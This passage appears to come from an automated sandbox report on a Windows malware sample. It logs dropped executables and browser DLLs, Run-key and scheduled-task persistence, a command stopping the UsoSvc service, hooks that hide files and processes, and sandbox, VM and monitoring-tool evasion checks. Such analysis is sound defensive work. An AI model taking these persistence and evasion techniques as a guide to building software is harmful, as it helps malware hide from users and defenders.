Source: random[1].exe0.12.dr	Static PE information: section name: lmbmcfaf
Source: random[1].exe0.12.dr	Static PE information: section name: .taggant
Source: 8490cd1d50.exe.12.dr	Static PE information: section name:
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: .rsrc
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: .idata
Source: 8490cd1d50.exe.12.dr	Static PE information: section name:
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: oovdzvsf
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: lmbmcfaf
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: .taggant
Source: random[2].exe.12.dr	Static PE information: section name:
Source: random[2].exe.12.dr	Static PE information: section name: .idata
Source: random[2].exe.12.dr	Static PE information: section name: qrrrzfoe
Source: random[2].exe.12.dr	Static PE information: section name: uhnzwkhm
Source: random[2].exe.12.dr	Static PE information: section name: .taggant
Source: c511421282.exe.12.dr	Static PE information: section name:
Source: c511421282.exe.12.dr	Static PE information: section name: .idata
Source: c511421282.exe.12.dr	Static PE information: section name: qrrrzfoe
Source: c511421282.exe.12.dr	Static PE information: section name: uhnzwkhm
Source: c511421282.exe.12.dr	Static PE information: section name: .taggant
Source: test2[1].exe.12.dr	Static PE information: section name: .00cfg
Source: test2.exe.12.dr	Static PE information: section name: .00cfg
Source: ekteefutuwre.exe.13.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_0069D91C push ecx; ret	9_2_0069D92F
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_00691359 push es; ret	9_2_0069135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007CD91C push ecx; ret	10_2_007CD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007CD91C push ecx; ret	11_2_007CD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00989680 push edx; mov dword ptr [esp], esi	12_2_0098969A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00989680 push esi; mov dword ptr [esp], ecx	12_2_009896DA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00989680 push 79943840h; mov dword ptr [esp], esp	12_2_009896E5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00989680 push 409BB061h; mov dword ptr [esp], edi	12_2_009897E4
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007CD91C push ecx; ret	12_2_007CD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007EDEDB push ss; iretd	12_2_007EDEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007CDFC6 push ecx; ret	12_2_007CDFD9

Source: file.exe	Static PE information: section name: oovdzvsf entropy: 7.953224192273572
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.0460702456803
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name: entropy: 7.0460702456803
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.0460702456803
Source: random[1].exe.12.dr	Static PE information: section name: entropy: 7.032891548671534
Source: 96b31e1a32.exe.12.dr	Static PE information: section name: entropy: 7.032891548671534
Source: random[1].exe0.12.dr	Static PE information: section name: oovdzvsf entropy: 7.953224192273572
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: oovdzvsf entropy: 7.953224192273572
Source: random[2].exe.12.dr	Static PE information: section name: entropy: 7.789321772592115
Source: c511421282.exe.12.dr	Static PE information: section name: entropy: 7.789321772592115

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHDGDGHCAAK.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\test2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	File created: C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsHDGDGHCAAK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	File created: C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHDGDGHCAAK.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8490cd1d50.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96b31e1a32.exe			Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHDGDGHCAAK.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96b31e1a32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 96b31e1a32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8490cd1d50.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8490cd1d50.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B792 second address: 59B797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B797 second address: 59B79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B79F second address: 59B7BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0148C8B7B3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
